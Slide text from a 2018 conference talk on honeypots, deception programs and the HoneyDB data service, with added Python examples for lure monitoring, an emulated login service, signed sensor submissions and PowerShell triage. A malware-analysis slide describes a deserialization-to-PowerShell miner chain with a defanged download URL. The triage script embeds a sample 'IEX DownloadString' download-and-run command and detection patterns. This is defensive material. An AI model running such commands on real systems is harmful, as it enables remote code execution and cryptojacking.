Presented on May 9, 2018 at SOURCE Conference Boston
(https://sourceconference.com/events/bos18/).
This version contains minor updates from previous presentations.
This talk will provide a quick overview of honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
2. BIO
Career Summary
● WebDev, DBA, SA, IT Auditor (~7 yrs)
● AppSec in Financials, EY & GS (~9 yrs)
On the socials
● Twitter: @foospidy
● Github: http://github.com/foospidy
● LinkedIn: http://linkedin.pxmx.io
● Blog: http://pxmx.io
Phillip Maddux
Trusted AppSec Advisor and
Senior Solutions Engineer
@ Signal Sciences
https://signalsciences.com
SOURCE Boston 2018
4. Honeypots 101
A networked computer configured to look like a legitimate system, but its real
purpose is to discover and/or track attackers.
Types of Honeypots:
- Production
- Research
Levels of Interaction:
Low - Emulated services, very limited interaction, no login capability (low risk).
Medium - Emulated services, emulated login, emulated commands.
High - Actual services, system logins, and commands (very risky).
5. Honeypots 101 - Production Honeypots
Production honeypots are computers on the network that have no legitimate
business purpose and should never see any traffic, unless…
- Something is misconfigured on the network
- A malicious actor on the network
Production honeypots are an additional layer to your defense strategy.
- Honeypot logs are low volume and high value
- Honeypots introduce risk to the attacker
7. Honeypots 101 - Production Honeypots
Additional Layer to…
Preventative controls
- Network & application firewalls
- Intrusion prevention systems
- Patch management
- Network compartmentalization
- Anti-virus
Detective controls
- Intrusion detection systems
- Network traffic analysis
- Endpoint monitoring
Control validation
- Vulnerability scans
- Audits
- Penetration testing
- Control performance monitoring
Honeypots
- Produce low volumes of data compared to the volumes of data from all other preventative and detective controls
8. Honeypots 101 - Research Honeypots
Research honeypots can have many purposes; it depends on what the research goals are.
Examples:
- Identify sources of malicious traffic
- Discover active malware, botnets, and C&C servers
- Learn about attacker techniques & tools
9. Honeypots 101 - Research Honeypots
[Diagram: traffic from bots, scanners, malware, DDoS botnets, etc. arriving over the Internet]
10. Honeypots 101 - Research Honeypots
ShmooCon 2015
Andrew Morris (@Andrew___Morris): No Budget Threat
Intelligence - Tracking Malware Campaigns on the Cheap
- Reversing malware
- Uncovering c2 servers
- Uncovering imminent ddos attacks
Presentation video
Now doing really cool stuff with…
(https://greynoise.io/)
11. Honeypots 101 - Hobbyist Honeypots
- Try it out.
- It’s fun!
This is not me.
(this is totally me)
15. Deception
Deception technology automates the creation of traps (decoys) and/or lures
which are mixed among and within existing IT resources to provide a layer of
protection to stop attackers that have penetrated the network. Traps (decoys) are
IT assets that either use real licensed operating system software, or are
emulations of these devices. [1]
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
16. Deception Automation
Automation for:
- Deploying deception endpoints as VMs, containers, or processes.
- Configuration of deception endpoints.
Centralized management interface, or API driven.
17. Deception Lures
Lures (aka breadcrumbs) - Lures are generally real information technology
resources (files of varying kinds) which are placed on actual IT assets. [1]
- Credentials to network resources or applications.
- Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
- Browser artifacts, e.g. history, favorites, cookies.
- Database connection strings
- Network drives
- etc.
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
19. Deception Layers
Network services - SSH, Telnet, FTP, etc.
Applications - cookies, directories, logins, functionality, etc.
Data - watermarks, triggers, records access, etc.
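Lures only pay off if someone is watching for their use. The following is an added example (not from the talk, HoneyPy or HoneyDB) of the monitoring side of the "Deception Lures" and "Deception Layers" slides: decoy credentials are planted on real assets, and any authentication event that names a decoy identity is an alert, because no legitimate user exists for it. The lure names, the log line format and the sample log are constructed for this example.

```python
"""Honeytoken lure monitor (added example; not from the talk, HoneyPy or HoneyDB).

Assumptions, all constructed for this example:
  - Lures are decoy credentials / connection strings planted on real hosts.
  - Authentication logs arrive as 'TIMESTAMP host=... user=... src=... result=...'.
  - Any use of a decoy identity is an alert: the credential has no legitimate owner.
"""
import re
import secrets
from dataclasses import dataclass

LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)

@dataclass(frozen=True)
class Lure:
    kind: str        # e.g. "ssh-credential", "db-connection-string"
    username: str    # decoy identity that should never authenticate anywhere
    planted_on: str  # the real asset where the breadcrumb was left

def make_lure(kind, planted_on, prefix="svc"):
    """Create a unique decoy username so each planted breadcrumb is attributable."""
    return Lure(kind=kind, username=f"{prefix}_{secrets.token_hex(4)}", planted_on=planted_on)

def render_breadcrumb(lure, host):
    """Text of the breadcrumb to drop on the asset (hypothetical formats)."""
    if lure.kind == "db-connection-string":
        return (f"Server={host};Database=payroll;User Id={lure.username};"
                f"Password={secrets.token_urlsafe(12)};")
    return f"ssh {lure.username}@{host}"

def scan_auth_log(lines, lures):
    """Return one alert per log line that uses a decoy username (success or failure)."""
    by_user = {l.username: l for l in lures}
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        lure = by_user.get(m["user"])
        if lure is None:
            continue
        alerts.append({
            "ts": m["ts"],
            "target": m["host"],
            "src": m["src"],
            "result": m["result"],
            "lure_kind": lure.kind,
            "planted_on": lure.planted_on,  # tells IR which asset was read
        })
    return alerts

def correlate_sources(alerts):
    """Map each source address to the assets whose breadcrumbs it used."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["src"], set()).add(a["planted_on"])
    return {src: sorted(assets) for src, assets in seen.items()}

# Constructed lures with fixed names so the example is reproducible.
LURES = [
    Lure("ssh-credential", "svc_backup_ro", planted_on="ws-finance-07"),
    Lure("db-connection-string", "svc_payroll_etl", planted_on="jump-01"),
]

# Constructed authentication log: two legitimate events, two decoy uses.
SAMPLE_LOG = """\
2018-05-09T10:00:01Z host=db-01 user=alice src=10.0.5.12 result=success
2018-05-09T10:02:13Z host=db-01 user=svc_payroll_etl src=10.0.5.12 result=failure
2018-05-09T10:02:20Z host=ssh-bastion user=svc_backup_ro src=10.0.5.12 result=success
2018-05-09T10:03:00Z host=db-01 user=bob src=10.0.7.3 result=success
""".splitlines()

if __name__ == "__main__":
    found = scan_auth_log(SAMPLE_LOG, LURES)
    for a in found:
        print(a)
    print(correlate_sources(found))
```

A failed login with a decoy identity is as interesting as a successful one; both mean the breadcrumb was read. The correlation step shows why each planted copy gets its own name: one source using lures from two different assets tells the responder which hosts have already been touched.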
20. Deception in Applications
2017
Herb Todd: Tangled Web: Defense in Deception
- The goals of deception from the perspective of both the attacker and defender
- The elements and processes needed to plan, prepare, execute, and monitor effective deception
- The types of deception techniques that are effective and how they translate into actual web
application capabilities
- How to identify and respond to various types of attackers.
Presentation video
My takeaway - a tailored solution is needed
23. Deception Market
Approximately 20 companies
Raised at least 201 million dollars
Top 5 funded range 19 million to 46 million
2 acquisitions
All this over the last 4, maybe 5 years
Numbers based on data from crunchbase.com as of Fall 2017
24. Deception Challenges
The concept of honeypots & deception has been around for years
The Cuckoo’s Egg - 1989
Bsides Raleigh 2017 (now Bsides RDU) source
27. Deception Challenges
Over the last 10 to 15 years organizations have focused on
getting the basics done…
● Vulnerability Assessment
● Patch Management
● Endpoint protection
● Network Monitoring (IDS/IPS)
● Controls Validation
● Security awareness / training
Deception
● No resources
● Not a priority
● Not fully understood
28. Deception Challenges
However, as organizations are becoming more mature in their security programs they are now thinking about deception…
What does a deception program look like for their organization?
29. Deception Program
Initial thoughts…
● Scope… intruder vs. insider, or both?
● Output... alerts vs. counter intelligence, or both?
● Coverage… external vs. internal, or both?
● Assets… network, applications, data?
● Validation… metrics and testing.
● Incident response… integration and prioritization.
Audit & Compliance?
30. Deception Challenges
Some other challenges…
● Some existing solutions are heavy/complex to deploy (also operational risk).
● Lures & breadcrumb management.
● Vulnerability scans reporting on sensors.
● Deception data risk (data is fake, incident is real).
● External facing deception can have an impact on security scorecard.
● How to implement deception in 3rd party vendor environments.
31. Deception Takeaways
Get the basics covered first
Think about your deception story (program)
Investigate solutions that are right sized for your organization’s maturity level
A solution needs to:
- have capability to be tailored
- be easy to deploy
- be easy to automate and integrate
- be light weight / low touch to manage
34. HoneyPy
- Low to medium interaction honeypot.
- Plugin based to implement various network services (tcp or udp).
- Open source, on Github https://github.com/foospidy/HoneyPy
- Written in Python.
- Plugins
- https://github.com/foospidy/HoneyPy/tree/master/plugins
- Service config
- https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
- Integrations (loggers)
- https://github.com/foospidy/HoneyPy/tree/master/loggers
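To make the "low interaction" level concrete, here is an added example of the smallest useful emulated service: a fake login prompt that records every line a client sends and never grants access. This is illustration code written for this page, not a HoneyPy plugin and not HoneyDB's agent; the banner, port and event fields are assumptions. Each attempt becomes one small event record, the low-volume, high-value data the production honeypot slides describe.

```python
"""Minimal low-interaction honeypot service (added example; not HoneyPy or HoneyDB code).

Models the "Low" interaction level: an emulated login prompt that records everything
the client sends and never grants access. Banner, port and event fields are assumptions
constructed for this example.
"""
import asyncio
import json
import time

BANNER = b"login: "   # constructed fake prompt; HoneyPy plugins define their own
MAX_BYTES = 1024      # cap how much client data is kept per event
IDLE_TIMEOUT = 30     # seconds to wait for a line before dropping the client

class LowInteractionService:
    """Two-step login emulation: ask for a user, ask for a password, always refuse."""

    def __init__(self, name="telnet-emu", port=2323, sink=None):
        self.name = name
        self.port = port
        # sink receives each event dict; default prints one JSON line (swap in a real logger)
        self.sink = sink or (lambda event: print(json.dumps(event)))
        self._stage = {}  # peer -> "user" | "password"

    def on_connect(self, peer):
        """Bytes sent to a newly connected client."""
        self._stage[peer] = "user"
        return BANNER

    def on_data(self, peer, data, now=None):
        """Record one line from the client; return (reply, close_after_reply)."""
        stage = self._stage.get(peer, "user")
        event = {
            "ts": time.time() if now is None else now,
            "service": self.name,
            "peer": peer,
            "stage": stage,
            "data": data[:MAX_BYTES].decode("utf-8", "replace").strip(),
        }
        self.sink(event)
        if stage == "user":
            self._stage[peer] = "password"
            return b"Password: ", False
        self._stage.pop(peer, None)
        return b"Login incorrect\r\n", True  # no login ever succeeds

    async def _handle(self, reader, writer):
        host, port = writer.get_extra_info("peername")[:2]
        peer = f"{host}:{port}"
        writer.write(self.on_connect(peer))
        await writer.drain()
        try:
            while True:
                data = await asyncio.wait_for(reader.readline(), timeout=IDLE_TIMEOUT)
                if not data:
                    break
                reply, close = self.on_data(peer, data)
                writer.write(reply)
                await writer.drain()
                if close:
                    break
        except (asyncio.TimeoutError, ConnectionError):
            pass
        finally:
            self._stage.pop(peer, None)
            writer.close()

    async def serve(self):
        server = await asyncio.start_server(self._handle, "0.0.0.0", self.port)
        async with server:
            await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(LowInteractionService().serve())
```

The protocol logic lives in `on_connect` and `on_data`, separate from the socket handling, so it can be exercised without opening a port; the idle timeout and byte cap keep a scanner from tying up the listener or bloating the log. Run it as a script and the service listens on port 2323, printing one JSON event per line received.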
35. HoneyDB
HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs.
honeydb.io
(redirects to riskdiscovery.com/honeydb)
53. HoneyDB - Frankenstein Cloud Architecture
[Architecture diagram. Components: serverless functions; Google Cloud BigQuery and PubSub; Novcon VMs running the HoneyDB web/API, MySQL (primary, replicating to secondary) and Redis for API request limiting. Labelled flows: get hmac, post events, pull events, pull tweets, replicate, query, inserts, stream events; one component marked "coming soon".]
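The diagram shows sensors obtaining an HMAC and posting events into the serverless layer. The slide does not spell out the protocol, so the following added example (not HoneyDB's API or code) sketches one standard way to authenticate such an exchange: each sensor holds a shared secret, signs sensor id, timestamp and body with HMAC-SHA256, and the collector verifies in constant time and rejects stale timestamps before streaming the batch onward. Header names, the sensor registry and the secret are assumptions constructed for this example.

```python
"""Signed sensor-to-collector event submission (added example; not HoneyDB's real API).

Sensor side signs (sensor id, timestamp, body); collector side verifies the HMAC in
constant time and rejects stale submissions. Header names, the sensor registry and
the secret are assumptions constructed for this example.
"""
import hashlib
import hmac
import json
import time

MAX_SKEW_SECONDS = 300  # reject submissions whose timestamp is further off than this

# Constructed registry of per-sensor secrets (a real collector would look these up).
SENSOR_SECRETS = {"sensor-0001": b"constructed-shared-secret-do-not-reuse"}

def _canonical(sensor_id, ts, body):
    # Fixed field order so sensor and collector hash exactly the same bytes.
    return f"{sensor_id}\n{ts}\n".encode() + body

def sign_events(sensor_id, secret, events, ts=None):
    """Sensor side: build headers and body for a batch of honeypot events."""
    ts = int(time.time()) if ts is None else ts
    body = json.dumps(events, sort_keys=True, separators=(",", ":")).encode()
    mac = hmac.new(secret, _canonical(sensor_id, ts, body), hashlib.sha256).hexdigest()
    headers = {"X-Sensor-Id": sensor_id, "X-Timestamp": str(ts), "X-Signature": mac}
    return headers, body

def verify_submission(headers, body, now=None):
    """Collector side: return (accepted, reason). Only accepted batches go to PubSub."""
    now = int(time.time()) if now is None else now
    sensor_id = headers.get("X-Sensor-Id")
    secret = SENSOR_SECRETS.get(sensor_id)
    if secret is None:
        return False, "unknown sensor"
    try:
        ts = int(headers.get("X-Timestamp", ""))
    except ValueError:
        return False, "bad timestamp"
    if abs(now - ts) > MAX_SKEW_SECONDS:
        return False, "stale timestamp"  # bounds replay of a captured request
    expected = hmac.new(secret, _canonical(sensor_id, ts, body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, headers.get("X-Signature", "")):
        return False, "bad signature"    # headers or body were altered
    try:
        events = json.loads(body)
    except ValueError:
        return False, "malformed body"
    return True, f"accepted {len(events)} events"

if __name__ == "__main__":
    # Constructed sample batch from one sensor.
    hdrs, payload = sign_events("sensor-0001", SENSOR_SECRETS["sensor-0001"],
                                [{"port": 23, "src": "198.51.100.7"}])
    print(verify_submission(hdrs, payload))
```

The timestamp is inside the signed data, so an attacker cannot refresh a captured request, and the secret never crosses the wire; what `get hmac` in the diagram provisions is the thing the sensor keeps. Per-sensor secrets also mean a compromised sensor can be revoked individually without re-keying the rest.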
56. HoneyDB - Note On Serverless Functions
IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost.
AWS Lambda is good - robust, but expensive… API gateway charges.
Google Cloud Functions is disappointing - easy to deploy, only nodejs, but… Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why?
Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
60. HoneyDB - How To Money?
Not practical, but wrote a cool script...
HoneyMiner
https://github.com/foospidy/HoneyMiner
61. HoneyDB - How To Money?
Masternodes…
Greater privacy of transactions
Performing immediate transactions
Participation in proceedings and voting
Activate budgeting and cashier system in cryptocurrencies
62. HoneyDB - How To Money?
Currently running 5 masternodes
across 2 VPS
Yields about $100 to $200 per month.
63. HoneyDB - But that crypto though.
Masternodes have potential, but require an initial investment and are at the mercy of market volatility.
64. HoneyDB - How to money?
Other options…
Sponsorships
Commercial Licensing
65. HoneyDB - Back To HaaS
Tools to get you honeypotting
● Honeydb-agent
○ Like HoneyPy, but a binary
● API Endpoints
● HoneyDB CLI
66. HoneyDB - New API Client Wrapper and CLI
pip install honeydb
usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty]
optional arguments:
-h, --help show this help message and exit
--bad-hosts Get bad hosts.
--sensor-data-count Get sensor data count.
--sensor-data Get sensor data.
--threatbin Get ThreatBin entries.
--twitter-threat-feed Get Twitter Threat Feed.
--mydata Filter on mydata.
--date DATE Date in format YYYY-MM-DD
--ip-address IP_ADDRESS IP address to filter on.
--from-id FROM_ID ID to continue retrieving sensor data.
--pretty Print JSON in pretty format.
71. HoneyDB - @MalwareMechanic
● I analyzed the initial POST you sent me. From there I was able to pull apart a scanner/worm/RAT!
● It appears to be GhostMiner to mine Monero!
74. HoneyDB - @MalwareMechanic
● This POST utilizes a Java deserialization
vulnerability to execute a base64 encoded
PowerShell command.
● This in turn downloads and executes a PowerShell
script (hxxp://123.59.68.172/Cache/DL.php).
● Installs a cryptominer via WMI.
● Attempts to stop the various services & tasks
before installing the new miner.
● Attempts to stop other miners.
● Attempts to stop processes listening on specific
ports.
● Also saw references to
powershell_reflective_mimikatz.
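The first thing a defender does with a capture like the one above is decode the embedded command. Here is an added example (not @MalwareMechanic's tooling and not part of HoneyDB) of that triage step: it finds `-EncodedCommand` style tokens in a captured POST body, decodes the base64 as the UTF-16LE text PowerShell expects, and tags the decoded script with indicators worth escalating (remote download, in-memory execution, WMI use, service or process tampering). The sample body, the `.invalid` host and the indicator list are constructed for this example.

```python
"""Decode and triage base64-encoded PowerShell in captured request bodies
(added example; not @MalwareMechanic's analysis code and not part of HoneyDB).

Sample body, placeholder host and indicator list are constructed for this example.
"""
import base64
import re

# The encoded-command switch in its common abbreviations, followed by the base64 argument.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed triage indicators: (label, regex over the decoded script text).
INDICATORS = [
    ("remote-download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("in-memory-exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("wmi-usage", re.compile(r"Invoke-WmiMethod|Get-WmiObject|Win32_Process", re.I)),
    ("service-tamper", re.compile(r"Stop-Service|Stop-Process|sc\.exe|net\s+stop", re.I)),
]

def encode_powershell(script):
    """UTF-16LE then base64: the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_powershell(b64):
    """Return the decoded script text, or None if the token is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def scan_body(body):
    """Find encoded PowerShell in a request body; return findings with matched indicators."""
    findings = []
    for m in ENC_RE.finditer(body):
        script = decode_powershell(m.group(1))
        if script is None:
            continue
        hits = [label for label, rx in INDICATORS if rx.search(script)]
        findings.append({"offset": m.start(), "script": script, "indicators": hits})
    return findings

# Constructed sample body: a download-and-run pattern and a harmless script, amid noise.
SAMPLE_BODY = (
    "junk=1&cmd=powershell -NoP -W Hidden -EncodedCommand "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/DL.ps1')")
    + "&other=powershell -enc "
    + encode_powershell("Write-Output 'constructed sample'")
)

if __name__ == "__main__":
    for f in scan_body(SAMPLE_BODY):
        print(f["offset"], f["indicators"], f["script"])
```

The decoded script, not the base64 blob, is what belongs in the alert and in the sandbox submission; the indicator labels give a first-pass severity so a download-and-execute hit is escalated ahead of a benign encoded command. Extend `INDICATORS` with whatever your environment considers noteworthy (for the campaign above, the miner, WMI and Mimikatz references).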
75. HoneyDB - Go Forth and Honeypot!
honeydb.io
Thanks!
Questions?